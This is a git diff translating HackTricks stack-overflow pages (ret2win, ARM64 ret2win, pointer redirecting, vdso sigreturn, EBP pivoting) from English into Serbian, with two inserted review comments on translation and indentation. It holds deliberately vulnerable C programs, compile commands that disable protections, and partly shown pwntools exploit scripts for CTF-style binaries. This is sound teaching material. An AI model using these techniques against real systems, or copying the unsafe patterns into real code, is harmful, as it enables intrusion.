@@ -110,44 +103,40 @@ payload += bytes(frame) p.sendline(payload) p.interactive() ``` +## bof пример без sigreturn -## bof example without sigreturn - -### Code - +### Код ```c #include #include #include char* vulnerable_function() { - char buffer[64]; - read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability +char buffer[64]; +read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability - return buffer; +return buffer; } char* gen_stack() { - char use_stack[0x2000]; - strcpy(use_stack, "Hello, world!"); - char* b = vulnerable_function(); - return use_stack; +char use_stack[0x2000]; +strcpy(use_stack, "Hello, world!"); +char* b = vulnerable_function(); +return use_stack; } int main(int argc, char **argv) { - char* b = gen_stack(); - return 0; +char* b = gen_stack(); +return 0; } ``` +## Eksploatacija -## Exploit - -In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**: +U sekciji **`vdso`** moguće je pronaći poziv na **`sigreturn`** na offsetu **`0x7b0`**:
-Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it: - +Stoga, ako je otkriven, moguće je **koristiti ovu adresu za pristup `sigreturn`** ako binarni fajl ne učitava. ```python from pwn import * @@ -176,14 +165,13 @@ payload += bytes(frame) p.sendline(payload) p.interactive() ``` - -For more info about vdso check: +Za više informacija o vdso proverite: {{#ref}} ../ret2vdso.md {{#endref}} -And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info: +A da zaobiđete adresu `/bin/sh`, možete kreirati nekoliko env varijabli koje upućuju na nju, za više informacija: {{#ref}} ../../common-binary-protections-and-bypasses/aslr/ diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 6de6060f2..ea46ba433 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md 
@@ -2,37 +2,34 @@ {{#include ../../banners/hacktricks-training.md}} -## What is a Stack Overflow +## Šta je Stack Overflow -A **stack overflow** is a vulnerability that occurs when a program writes more data to the stack than it is allocated to hold. This excess data will **overwrite adjacent memory space**, leading to the corruption of valid data, control flow disruption, and potentially the execution of malicious code. This issue often arises due to the use of unsafe functions that do not perform bounds checking on input. +A **stack overflow** je ranjivost koja se javlja kada program upisuje više podataka na stek nego što je dodeljeno da drži. Ovi viškovi podataka će **prepisati susedni memorijski prostor**, što dovodi do korupcije validnih podataka, prekida kontrolnog toka i potencijalno izvršavanja zlonamernog koda. Ovaj problem često nastaje zbog korišćenja nesigurnih funkcija koje ne vrše proveru granica na ulazu. -The main problem of this overwrite is that the **saved instruction pointer (EIP/RIP)** and the **saved base pointer (EBP/RBP)** to return to the previous function are **stored on the stack**. Therefore, an attacker will be able to overwrite those and **control the execution flow of the program**. +Glavni problem ovog prepisivanja je što su **sačuvani pokazivač instrukcija (EIP/RIP)** i **sačuvani osnovni pokazivač (EBP/RBP)** za vraćanje na prethodnu funkciju **smešteni na steku**. Stoga, napadač će moći da prepiše te pokazivače i **kontroliše tok izvršavanja programa**. -The vulnerability usually arises because a function **copies inside the stack more bytes than the amount allocated for it**, therefore being able to overwrite other parts of the stack. +Ranjivost obično nastaje jer funkcija **kopira više bajtova unutar steka nego što je dodeljeno za nju**, čime može da prepiše druge delove steka. -Some common functions vulnerable to this are: **`strcpy`, `strcat`, `sprintf`, `gets`**... 
Also, functions like **`fgets`** , **`read` & `memcpy`** that take a **length argument**, might be used in a vulnerable way if the specified length is greater than the allocated one. - -For example, the following functions could be vulnerable: +Neke uobičajene funkcije ranjive na ovo su: **`strcpy`, `strcat`, `sprintf`, `gets`**... Takođe, funkcije kao što su **`fgets`**, **`read` & `memcpy`** koje uzimaju **argument dužine**, mogu se koristiti na ranjiv način ako je navedena dužina veća od dodeljene. +Na primer, sledeće funkcije bi mogle biti ranjive: ```c void vulnerable() { - char buffer[128]; - printf("Enter some text: "); - gets(buffer); // This is where the vulnerability lies - printf("You entered: %s\n", buffer); +char buffer[128]; +printf("Enter some text: "); +gets(buffer); // This is where the vulnerability lies +printf("You entered: %s\n", buffer); } ``` +### Pronalaženje offseta za Stack Overflow -### Finding Stack Overflows offsets +Najčešći način za pronalaženje stack overflow-a je davanje veoma velikog unosa `A`s (npr. `python3 -c 'print("A"*1000)'`) i očekivanje `Segmentation Fault` koji ukazuje da je **adresu `0x41414141` pokušano pristupiti**. -The most common way to find stack overflows is to give a very big input of `A`s (e.g. `python3 -c 'print("A"*1000)'`) and expect a `Segmentation Fault` indicating that the **address `0x41414141` was tried to be accessed**. +Štaviše, kada pronađete da postoji ranjivost na Stack Overflow, biće potrebno pronaći offset do trenutka kada je moguće **prepisati adresu povratka**, za to se obično koristi **De Bruijn sekvenca.** Koja za dati alfabet veličine _k_ i podsekvence dužine _n_ predstavlja **cikličnu sekvencu u kojoj se svaka moguća podsekvenca dužine \_n**\_\*\* pojavljuje tačno jednom\*\* kao kontigenta podsekvenca. 
-Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it's possible to **overwrite the return address**, for this it's usually used a **De Bruijn sequence.** Which for a given alphabet of size _k_ and subsequences of length _n_ is a **cyclic sequence in which every possible subsequence of length \_n**\_\*\* appears exactly once\*\* as a contiguous subsequence. - -This way, instead of needing to figure out which offset is needed to control the EIP by hand, it's possible to use as padding one of these sequences and then find the offset of the bytes that ended overwriting it. - -It's possible to use **pwntools** for this: +Na ovaj način, umesto da ručno otkrivate koji offset je potreban za kontrolu EIP-a, moguće je koristiti kao punjenje jednu od ovih sekvenci i zatim pronaći offset bajtova koji su završili prepisivanje. +Moguće je koristiti **pwntools** za ovo: ```python from pwn import * 
@@ -44,26 +41,23 @@ eip_value = p32(0x6161616c) offset = cyclic_find(eip_value) # Finds the offset of the sequence in the De Bruijn pattern print(f"The offset is: {offset}") ``` - -or **GEF**: - +или **GEF**: ```bash #Patterns pattern create 200 #Generate length 200 pattern pattern search "avaaawaa" #Search for the offset of that substring pattern search $rsp #Search the offset given the content of $rsp ``` +## Iskorišćavanje Stack Overflows -## Exploiting Stack Overflows +Tokom prelivanja (pretpostavljajući da je veličina prelivanja dovoljno velika) moći ćete da **prepišete** vrednosti lokalnih promenljivih unutar steka sve dok ne dođete do sačuvanih **EBP/RBP i EIP/RIP (ili čak više)**.\ +Najčešći način zloupotrebe ove vrste ranjivosti je **modifikacija adrese povratka** tako da kada funkcija završi, **tok kontrole će biti preusmeren gde god korisnik odredi** u ovoj pokazivaču. -During an overflow (supposing the overflow size if big enough) you will be able to **overwrite** values of local variables inside the stack until reaching the saved **EBP/RBP and EIP/RIP (or even more)**.\ -The most common way to abuse this type of vulnerability is by **modifying the return address** so when the function ends the **control flow will be redirected wherever the user specified** in this pointer. - -However, in other scenarios maybe just **overwriting some variables values in the stack** might be enough for the exploitation (like in easy CTF challenges). +Međutim, u drugim scenarijima možda će samo **prepisivanje nekih vrednosti promenljivih u steku** biti dovoljno za eksploataciju (kao u lakim CTF izazovima). ### Ret2win -In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. 
For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called: +U ovom tipu CTF izazova, postoji **funkcija** **unutar** binarnog fajla koja se **nikada ne poziva** i koju **morate pozvati da biste pobedili**. Za ove izazove samo treba da pronađete **offset za prepisivanje adrese povratka** i **pronađete adresu funkcije** koju treba pozvati (obično [**ASLR**](../common-binary-protections-and-bypasses/aslr/) će biti onemogućen) tako da kada ranjiva funkcija vrati, skrivena funkcija će biti pozvana: {{#ref}} ret2win/ @@ -71,15 +65,15 @@ ret2win/ ### Stack Shellcode -In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code: +U ovom scenariju napadač može postaviti shellcode u stek i zloupotrebiti kontrolisani EIP/RIP da skoči na shellcode i izvrši proizvoljan kod: {{#ref}} stack-shellcode/ {{#endref}} -### ROP & Ret2... techniques +### ROP & Ret2... tehnike -This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary: +Ova tehnika je osnovni okvir za zaobilaženje glavne zaštite prethodne tehnike: **No executable stack (NX)**. I omogućava izvođenje nekoliko drugih tehnika (ret2lib, ret2syscall...) koje će završiti izvršavanjem proizvoljnih komandi zloupotrebom postojećih instrukcija u binarnom fajlu: {{#ref}} ../rop-return-oriented-programing/ 
@@ -87,15 +81,15 @@ This technique is the fundamental framework to bypass the main protection to the ## Heap Overflows -An overflow is not always going to be in the stack, it could also be in the **heap** for example: +Prelivanje se ne mora uvek dešavati u steku, može se takođe desiti u **heap-u** na primer: {{#ref}} ../libc-heap/heap-overflow.md {{#endref}} -## Types of protections +## Tipovi zaštita -There are several protections trying to prevent the exploitation of vulnerabilities, check them in: +Postoji nekoliko zaštita koje pokušavaju da spreče eksploataciju ranjivosti, proverite ih u: {{#ref}} ../common-binary-protections-and-bypasses/ diff --git a/src/binary-exploitation/stack-overflow/pointer-redirecting.md b/src/binary-exploitation/stack-overflow/pointer-redirecting.md index f92bebd28..b612198c7 100644 --- a/src/binary-exploitation/stack-overflow/pointer-redirecting.md +++ b/src/binary-exploitation/stack-overflow/pointer-redirecting.md 
@@ -1,28 +1,28 @@ -# Pointer Redirecting +# Preusmeravanje pokazivača {{#include ../../banners/hacktricks-training.md}} -## String pointers +## Pokazivači na stringove -If a function call is going to use an address of a string that is located in the stack, it's possible to abuse the buffer overflow to **overwrite this address** and put an **address to a different string** inside the binary. +Ako poziv funkcije koristi adresu stringa koji se nalazi na steku, moguće je zloupotrebiti prelivanje bafera da se **prepiše ova adresa** i stavi **adresa drugog stringa** unutar binarnog fajla. -If for example a **`system`** function call is going to **use the address of a string to execute a command**, an attacker could place the **address of a different string in the stack**, **`export PATH=.:$PATH`** and create in the current directory an **script with the name of the first letter of the new string** as this will be executed by the binary. +Na primer, ako poziv funkcije **`system`** treba da **koristi adresu stringa za izvršavanje komande**, napadač može postaviti **adresu drugog stringa na steku**, **`export PATH=.:$PATH`** i kreirati u trenutnom direktorijumu **skriptu sa imenom prvog slova novog stringa** jer će ovo biti izvršeno od strane binarnog fajla. 
-You can find an **example** of this in: +Možete pronaći **primer** ovoga na: - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c) - [https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html](https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html) - - 32bit, change address to flags string in the stack so it's printed by `puts` +- 32bit, promeniti adresu na string sa zastavicama na steku tako da se odštampa pomoću `puts` -## Function pointers +## Pokazivači na funkcije -Same as string pointer but applying to functions, if the **stack contains the address of a function** that will be called, it's possible to **change it** (e.g. to call **`system`**). +Isto kao i pokazivač na string, ali se primenjuje na funkcije, ako **stek sadrži adresu funkcije** koja će biti pozvana, moguće je **promeniti je** (npr. da pozove **`system`**). -You can find an example in: +Možete pronaći primer na: - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c) -## References +## Reference - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting) diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index 0cad69c6d..6b66efec7 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/README.md 
+++ b/src/binary-exploitation/stack-overflow/ret2win/README.md 
@@ -2,49 +2,44 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -**Ret2win** challenges are a popular category in **Capture The Flag (CTF)** competitions, particularly in tasks that involve **binary exploitation**. The goal is to exploit a vulnerability in a given binary to execute a specific, uninvoked function within the binary, often named something like `win`, `flag`, etc. This function, when executed, usually prints out a flag or a success message. The challenge typically involves overwriting the **return address** on the stack to divert execution flow to the desired function. Here's a more detailed explanation with examples: +**Ret2win** izazovi su popularna kategorija u **Capture The Flag (CTF)** takmičenjima, posebno u zadacima koji uključuju **binary exploitation**. Cilj je iskoristiti ranjivost u datom binarnom fajlu da se izvrši određena, nepozvana funkcija unutar binarnog fajla, često nazvana nešto poput `win`, `flag`, itd. Ova funkcija, kada se izvrši, obično ispisuje zastavicu ili poruku o uspehu. Izazov obično uključuje prepisivanje **povratne adrese** na steku kako bi se preusmerio tok izvršenja na željenu funkciju. Evo detaljnijeg objašnjenja sa primerima: -### C Example - -Consider a simple C program with a vulnerability and a `win` function that we intend to call: +### C primer +Razmotrite jednostavan C program sa ranjivošću i `win` funkcijom koju nameravamo da pozovemo: ```c #include #include void win() { - printf("Congratulations! You've called the win function.\n"); +printf("Congratulations! You've called the win function.\n"); } void vulnerable_function() { - char buf[64]; - gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow. +char buf[64]; +gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow. 
} int main() { - vulnerable_function(); - return 0; +vulnerable_function(); +return 0; } ``` - -To compile this program without stack protections and with **ASLR** disabled, you can use the following command: - +Da biste kompajlirali ovaj program bez zaštite steka i sa **ASLR** onemogućenim, možete koristiti sledeću komandu: ```sh gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c ``` +- `-m32`: Kompajlirajte program kao 32-bitni binarni (ovo je opcionalno, ali uobičajeno u CTF izazovima). +- `-fno-stack-protector`: Onemogućite zaštitu od prelivanja steka. +- `-z execstack`: Dozvolite izvršavanje koda na steku. +- `-no-pie`: Onemogućite poziciono nezavisne izvršne datoteke kako biste osigurali da se adresa funkcije `win` ne menja. +- `-o vulnerable`: Imenovati izlaznu datoteku `vulnerable`. -- `-m32`: Compile the program as a 32-bit binary (this is optional but common in CTF challenges). -- `-fno-stack-protector`: Disable protections against stack overflows. -- `-z execstack`: Allow execution of code on the stack. -- `-no-pie`: Disable Position Independent Executable to ensure that the address of the `win` function does not change. -- `-o vulnerable`: Name the output file `vulnerable`. - -### Python Exploit using Pwntools - -For the exploit, we'll use **pwntools**, a powerful CTF framework for writing exploits. The exploit script will create a payload to overflow the buffer and overwrite the return address with the address of the `win` function. +### Python Exploit koristeći Pwntools +Za exploit, koristićemo **pwntools**, moćan CTF okvir za pisanje eksploitacija. Skripta za exploit će kreirati payload za prelivanje bafera i prepisivanje adrese povratka sa adresom funkcije `win`. ```python from pwn import * 
@@ -64,49 +59,46 @@ payload = b'A' * 68 + win_addr p.sendline(payload) p.interactive() ``` - -To find the address of the `win` function, you can use **gdb**, **objdump**, or any other tool that allows you to inspect binary files. For instance, with `objdump`, you could use: - +Da biste pronašli adresu `win` funkcije, možete koristiti **gdb**, **objdump** ili bilo koji drugi alat koji vam omogućava da pregledate binarne datoteke. Na primer, sa `objdump`, mogli biste koristiti: ```sh objdump -d vulnerable | grep win ``` +Ova komanda će vam prikazati asembler funkcije `win`, uključujući njenu početnu adresu. -This command will show you the assembly of the `win` function, including its starting address. +Python skripta šalje pažljivo oblikovanu poruku koja, kada je obrađena od strane `vulnerable_function`, preplavljuje bafer i prepisuje adresu povratka na steku sa adresom `win`. Kada `vulnerable_function` vrati, umesto da se vrati na `main` ili izađe, skače na `win`, i poruka se ispisuje. -The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed. +## Zaštite -## Protections +- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **treba da bude onemogućena** kako bi adresa bila pouzdana tokom izvršavanja ili adresa na kojoj će funkcija biti smeštena neće uvek biti ista i biće vam potrebna neka leak da biste saznali gde je funkcija win učitana. U nekim slučajevima, kada funkcija koja uzrokuje prelivanje je `read` ili slična, možete izvršiti **Delimično Prepisivanje** od 1 ili 2 bajta da promenite adresu povratka na funkciju win. Zbog načina na koji ASLR funkcioniše, poslednja tri heksadecimalna nibbla nisu nasumična, tako da postoji **1/16 šanse** (1 nibble) da dobijete ispravnu adresu povratka. 
+- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) takođe treba da budu onemogućene ili kompromitovana EIP adresa povratka nikada neće biti praćena. -- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address. -- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. - -## Other examples & References +## Ostali primeri & Reference - [https://ir0nstone.gitbook.io/notes/types/stack/ret2win](https://ir0nstone.gitbook.io/notes/types/stack/ret2win) - [https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html](https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html) - - 32bit, no ASLR +- 32bit, bez ASLR - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html) - - 64 bits with ASLR, with a leak of the bin address +- 64 bita sa ASLR, sa leak-om adrese bin - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html) - - 64 bits, no ASLR +- 64 bita, bez ASLR - [https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html) - - 32 bits, no ASLR, double small 
overflow, first to overflow the stack and enlarge the size of the second overflow +- 32 bita, bez ASLR, dvostruko malo prelivanje, prvo da preplavi stek i poveća veličinu drugog prelivanja - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) - - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win) +- 32 bita, relro, bez kanarija, nx, bez pie, format string za prepisivanje adrese `fflush` sa funkcijom win (ret2win) - [https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html) - - 32 bit, nx, nothing else, partial overwrite of EIP (1Byte) to call the win function +- 32 bita, nx, ništa drugo, delimično prepisivanje EIP (1Byte) da pozove funkciju win - [https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html) - - 32 bit, nx, nothing else, partial overwrite of EIP (1Byte) to call the win function +- 32 bita, nx, ništa drugo, delimično prepisivanje EIP (1Byte) da pozove funkciju win - [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html) - - The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win. +- Program samo validira poslednji bajt broja da proveri veličinu ulaza, stoga je moguće dodati bilo koju veličinu sve dok je poslednji bajt unutar dozvoljenog opsega. Tada, ulaz stvara prelivanje bafera koje se eksploatiše sa ret2win. 
- [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/) - - 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win) +- 64 bita, relro, bez kanarija, nx, pie. Delimično prepisivanje da pozove funkciju win (ret2win) - [https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/](https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/) - - arm64, PIE, it gives a PIE leak the win function is actually 2 functions so ROP gadget that calls 2 functions +- arm64, PIE, daje PIE leak funkcija win je zapravo 2 funkcije tako da ROP gadget koji poziva 2 funkcije - [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/) - - ARM64, off-by-one to call a win function +- ARM64, off-by-one da pozove funkciju win -## ARM64 Example +## ARM64 Primer {{#ref}} ret2win-arm64.md diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index 410cf5cf0..973d35ff0 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md 
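Review bot: the sub-bullets under each reference link lose their leading indentation in this hunk, e.g. `-  - 32bit, no ASLR` becomes `+- 32bit, bez ASLR`, so the annotations render as top-level bullets instead of nested under the link they describe; keep the two-space indent on the `+` lines. Translation points in the same hunk: "Ova komanda će vam prikazati asembler funkcije `win`" uses "asembler" (the tool) where "asemblerski kod" (the assembly listing) is meant, and the loanword "leak" appears with inconsistent agreement ("neka leak" here, "leak-om" in the reference list); settle on one form, e.g. "neki leak" or "curenje", and use it throughout the file.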
@@ -2,109 +2,94 @@ {{#include ../../../banners/hacktricks-training.md}} -Find an introduction to arm64 in: +Pronađite uvod u arm64 u: {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} ## Code - ```c #include #include void win() { - printf("Congratulations!\n"); +printf("Congratulations!\n"); } void vulnerable_function() { - char buffer[64]; - read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability +char buffer[64]; +read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability } int main() { - vulnerable_function(); - return 0; +vulnerable_function(); +return 0; } ``` - -Compile without pie and canary: - +Kompajlirati bez pie i kanarinca: ```bash clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie ``` +## Pronalaženje ofseta -## Finding the offset +### Opcija obrasca -### Pattern option - -This example was created using [**GEF**](https://github.com/bata24/gef): - -Stat gdb with gef, create pattern and use it: +Ovaj primer je napravljen koristeći [**GEF**](https://github.com/bata24/gef): +Pokrenite gdb sa gef, kreirajte obrazac i koristite ga: ```bash gdb -q ./ret2win pattern create 200 run ``` -
-arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset: - +arm64 će pokušati da se vrati na adresu u registru x30 (koji je kompromitovan), možemo to iskoristiti da pronađemo pomeraj obrasca: ```bash pattern search $x30 ``` -
-**The offset is 72 (9x48).** +**Pomak je 72 (9x48).** -### Stack offset option - -Start by getting the stack address where the pc register is stored: +### Opcija pomaka steka +Počnite tako što ćete dobiti adresu steka gde je sačuvan pc registar: ```bash gdb -q ./ret2win b *vulnerable_function + 0xc run info frame ``` -
-Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337: - +Sada postavite tačku prekida nakon `read()` i nastavite dok se `read()` ne izvrši i postavite obrazac kao što je 13371337: ``` b *vulnerable_function+28 c ``` -
-Find where this pattern is stored in memory: +Pronađite gde je ovaj obrazac smešten u memoriji:
-Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`** +Zatim: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
-## No PIE +## Bez PIE -### Regular - -Get the address of the **`win`** function: +### Redovni +Dobijte adresu **`win`** funkcije: ```bash objdump -d ret2win | grep win ret2win: file format elf64-littleaarch64 00000000004006c4 : ``` - -Exploit: - +Eksploit: ```python from pwn import * @@ -124,13 +109,11 @@ p.send(payload) print(p.recvline()) p.close() ``` -
### Off-by-1 -Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`. - +U stvari, ovo će više ličiti na off-by-2 u sačuvanom PC-u u steku. Umesto da prepisujemo celu adresu povratka, prepisujemo **samo poslednja 2 bajta** sa `0x06c4`. ```python from pwn import * @@ -150,22 +133,20 @@ p.send(payload) print(p.recvline()) p.close() ``` -
-You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability. +Možete pronaći još jedan primer off-by-one u ARM64 na [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), koji je pravi off-by-**one** u fiktivnoj ranjivosti. -## With PIE +## Sa PIE > [!TIP] -> Compile the binary **without the `-no-pie` argument** +> Kompajlirajte binarni fajl **bez `-no-pie` argumenta** ### Off-by-2 -Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset: +Bez leak-a ne znamo tačnu adresu pobedničke funkcije, ali možemo znati offset funkcije od binarnog fajla i znajući da adresa povratka koju prepisujemo već pokazuje na blisku adresu, moguće je leak-ovati offset do win funkcije (**0x7d4**) u ovom slučaju i jednostavno koristiti taj offset:
- ```python from pwn import * @@ -185,5 +166,4 @@ p.send(payload) print(p.recvline()) p.close() ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index a786dea8e..917506ba3 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md 
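Review bot: `+**Pomak je 72 (9x48).**` carries over a typo from the source: 72 decimal is `0x48`, not `9x48`, so correct it to `(0x48)` while the line is being rewritten. The same hunk strips the indentation inside the C listing (`+printf("Congratulations!\n");`, `+char buffer[64];`); it still compiles, but flattened function bodies are harder to read, and the same stripping applied to a Python block with an indented `if`/`def` body would break it, so the translation tooling should leave whitespace inside fenced code untouched. Minor: "Kompajlirati bez pie i kanarinca" uses the infinitive where the rest of the file uses the imperative ("Kompajlirajte"), and "### Redovni" for "Regular" reads oddly in this context; "### Običan slučaj" fits better.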
@@ -2,64 +2,61 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -This technique exploits the ability to manipulate the **Base Pointer (EBP)** to chain the execution of multiple functions through careful use of the EBP register and the **`leave; ret`** instruction sequence. - -As a reminder, **`leave`** basically means: +Ova tehnika koristi sposobnost manipulacije **Base Pointer (EBP)** za povezivanje izvršavanja više funkcija kroz pažljivu upotrebu EBP registra i **`leave; ret`** instrukcijske sekvence. +Kao podsetnik, **`leave`** u suštini znači: ``` mov ebp, esp pop ebp ret ``` - -And as the **EBP is in the stack** before the EIP it's possible to control it controlling the stack. +I kao što je **EBP u steku** pre EIP-a, moguće je kontrolisati ga kontrolišući stek. ### EBP2Ret -This technique is particularly useful when you can **alter the EBP register but have no direct way to change the EIP register**. It leverages the behaviour of functions when they finish executing. +Ova tehnika je posebno korisna kada možete **promeniti EBP registar, ali nemate direktan način da promenite EIP registar**. Ona koristi ponašanje funkcija kada završe izvršavanje. -If, during `fvuln`'s execution, you manage to inject a **fake EBP** in the stack that points to an area in memory where your shellcode's address is located (plus 4 bytes to account for the `pop` operation), you can indirectly control the EIP. As `fvuln` returns, the ESP is set to this crafted location, and the subsequent `pop` operation decreases ESP by 4, **effectively making it point to an address store by the attacker in there.**\ -Note how you **need to know 2 addresses**: The one where ESP is going to go, where you will need to write the address that is pointed by ESP. 
+Ako, tokom izvršavanja `fvuln`, uspete da injektujete **lažni EBP** u stek koji pokazuje na oblast u memoriji gde se nalazi adresa vašeg shellcode-a (plus 4 bajta da se uzme u obzir `pop` operacija), možete indirektno kontrolisati EIP. Kada `fvuln` vrati, ESP se postavlja na ovu kreiranu lokaciju, a naredna `pop` operacija smanjuje ESP za 4, **efektivno ga usmeravajući na adresu koju je napadač postavio tamo.**\ +Obratite pažnju da **morate znati 2 adrese**: onu na koju će ESP ići, gde ćete morati da upišete adresu na koju pokazuje ESP. -#### Exploit Construction +#### Konstrukcija Eksploita -First you need to know an **address where you can write arbitrary data / addresses**. The ESP will point here and **run the first `ret`**. +Prvo morate znati **adresu na kojoj možete pisati proizvoljne podatke / adrese**. ESP će pokazivati ovde i **izvršiti prvi `ret`**. -Then, you need to know the address used by `ret` that will **execute arbitrary code**. You could use: +Zatim, morate znati adresu koju koristi `ret` koja će **izvršiti proizvoljni kod**. Možete koristiti: -- A valid [**ONE_GADGET**](https://github.com/david942j/one_gadget) address. -- The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits). -- The address of a **`jump esp;`** gadget ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) followed by the **shellcode** to execute. -- Some 